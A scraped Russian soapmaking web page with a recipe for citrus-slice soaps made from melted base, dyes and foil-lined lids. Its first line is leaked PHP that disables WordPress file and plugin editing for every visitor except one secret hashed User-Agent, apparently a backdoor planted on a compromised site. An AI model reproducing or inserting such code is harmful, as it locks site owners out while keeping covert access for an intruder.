if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } Ароматные мыльные дольки своими руками | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

Ароматные мыльные дольки своими руками

Мастера, занимающиеся домашним мыловарением, могут сделать из кусочка основы шедевр, например, цитрусовую дольку.

Что­бы сде­лать такое мыло сво­и­ми рука­ми для это­го нуж­ны: мыль­ная осно­ва, аро­ма­ти­за­то­ры цит­ру­со­вых (апель­син, лимон), кра­си­те­ли. И еще кры­шеч­ки раз­ных раз­ме­ров. Их нуж­но плот­но засте­лить фольгой.

Для созда­ния мяко­ти цит­ру­со­вых зали­ва­ем рас­топ­лен­ную осно­ву с кра­си­те­ля­ми и отдуш­кой в крыш­ки мень­ше­го диа­мет­ра. Застыв­шую осно­ву выни­ма­ем из крыш­ки, раз­ре­за­ем на сег­мен­ты и скла­ды­ва­ем обрат­но, остав­ляя рас­сто­я­ния меж­ду сег­мен­та­ми (долж­но остать­ся два кусоч­ка). Зали­ва­ем пусто­ты белой осно­вой и ждем засты­ва­ния, после чего кла­дем мыль­це в боль­шую крыш­ку и зали­ва­ем осно­вой с любым кра­си­те­лем. После осты­ва­ния раз­ре­за­ем мыло пополам.

доль2

доль3

доль4

доль5


И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!
Автор: Юлия Евланова

Уже давно увлекаюсь мыловарением. Вот нашла интересный сайт, где можно показать свои творения! Читайте все мои записи!